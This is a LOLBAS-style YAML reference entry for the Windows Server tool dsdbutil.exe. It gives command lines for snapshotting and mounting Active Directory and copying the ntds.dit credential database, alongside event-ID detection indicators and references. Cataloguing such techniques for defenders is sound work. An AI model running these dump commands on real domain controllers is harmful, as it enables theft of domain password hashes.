---
Name: dsdbutil.exe
Description: Dsdbutil is a command-line tool that is built into Windows Server. It is available if you have the AD LDS server role installed. Can be used as a command line utility to export Active Directory.
Aliases:
  - Alias: dsDbUtil.exe  # PE Original filename
Author: Ekitji
Created: 2023-05-31
Commands:
  - Command: dsdbutil.exe "activate instance ntds" "snapshot" "create" "quit" "quit"
    Description: dsdbutil supports VSS snapshot creation
    Usecase: Snapshoting of Active Directory NTDS.dit database
    Category: Dump
    Privileges: Administrator
    MitreID: T1003.003
    OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019
  - Command: dsdbutil.exe "activate instance ntds" "snapshot" "mount {GUID}" "quit" "quit"
    Description: Mounting the snapshot with its GUID
    Usecase: Mounting the snapshot to access the ntds.dit with copy c:\[Snap Volume]\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak
    Category: Dump
    Privileges: Administrator
    MitreID: T1003.003
    OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019
  - Command: dsdbutil.exe "activate instance ntds" "snapshot" "delete {GUID}" "quit" "quit"
    Description: Deletes the mount of the snapshot
    Usecase: Deletes the snapshot
    Category: Dump
    Privileges: Administrator
    MitreID: T1003.003
    OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019
  - Command: dsdbutil.exe "activate instance ntds" "snapshot" "create" "list all" "mount 1" "quit" "quit"
    Description: Mounting with snapshot identifier
    Usecase: Mounting the snapshot identifier 1 and accessing it with with copy c:\[Snap Volume]\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak
    Category: Dump
    Privileges: Administrator
    MitreID: T1003.003
    OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019
  - Command: dsdbutil.exe "activate instance ntds" "snapshot" "list all" "delete 1" "quit" "quit"
    Description: Deletes the mount of the snapshot
    Usecase: deletes the snapshot
    Category: Dump
    Privileges: Administrator
    MitreID: T1003.003
    OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019
Full_Path:
  - Path: C:\Windows\System32\dsdbutil.exe
  - Path: C:\Windows\SysWOW64\dsdbutil.exe
Code_Sample:
  - Code:
Detection:
  - IOC: Event ID 4688
  - IOC: dsdbutil.exe process creation
  - IOC: Event ID 4663
  - IOC: Regular and Volume Shadow Copy attempts to read or modify ntds.dit
  - IOC: Event ID 4656
  - IOC: Regular and Volume Shadow Copy attempts to read or modify ntds.dit
  - Analysis:
  - Sigma:
  - Elastic:
  - Splunk:
  - BlockRule:
Resources:
  - Link: https://gist.github.com/bohops/88561ca40998e83deb3d1da90289e358
  - Link: https://www.netwrix.com/ntds_dit_security_active_directory.html
Acknowledgement:
  - Person: bohop
    Handle: '@bohops'
  - Person: Ekitji
    Handle: '@eki_erk'